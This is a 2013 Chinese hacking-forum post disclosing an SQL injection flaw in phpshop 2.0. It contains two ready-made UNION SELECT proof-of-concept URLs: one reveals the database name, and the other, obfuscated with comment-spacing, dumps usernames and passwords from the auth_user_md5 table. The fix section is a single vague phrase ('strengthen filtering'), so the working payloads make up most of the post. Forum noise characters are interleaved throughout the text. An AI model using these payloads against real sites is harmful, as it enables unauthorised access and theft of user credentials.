找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1943|回复: 0
打印 上一主题 下一主题

phpshop 2.0 SQL注入及修复

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-18 18:24:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
标题 : phpshop 2.0 SQL Injection Vulnerability8 s; G8 K, C# j2 b/ {& Y: h8 L+ w2 Z

& m7 ~* @) a) D; _作者 : By onestree
' w; A; s  k6 }下载地址 : http://code.google.com/p/phpshop/downloads/list' c4 k2 R  Y+ ]" ?6 c. G
测试地址: windows 7 / ubuntu* ^* F) o/ l; }! P/ ~: a1 _4 R
, }3 V$ f) n( N; Y1 m7 Y: i
; A) i  X0 v% }) s; o9 R6 A% X% N
SQLi p0c:
& V- O9 H" F+ |1 u. n' l: N
1 Q+ v4 c8 d$ _1 W/ l6 g& o==================& P; w- B9 p3 M+ Q. g

5 q4 d1 R- l. f0 r' h, Vhttp://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'" ~" ?0 n" O( N1 o
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --! h1 H2 K0 ^0 {1 l2 e+ C' X5 G
( |" k, v1 `0 }+ K' W$ d2 m
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
& W1 z7 d0 {: x7 L
/ d0 n+ f6 [2 A- S" ?, i, A( b修复:
$ Z! x  `- R  a加强过滤; e) j- }) a% ~% @( U/ L
* ]  ]* W4 U8 |, Q4 H
+ _2 `% `% v9 ?& w4 b/ @
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表